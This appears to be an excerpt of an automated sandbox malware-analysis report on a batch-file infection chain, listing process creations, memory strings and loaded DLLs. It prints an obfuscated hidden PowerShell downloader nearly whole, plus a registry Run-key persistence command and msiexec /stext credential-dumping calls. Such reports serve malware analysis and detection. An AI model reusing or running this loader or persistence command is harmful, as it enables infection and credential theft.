                Source: msiexec.exe, msiexec.exe, 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 0000000F.00000002.1968628137.00000000043AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_16-33236
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Met
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
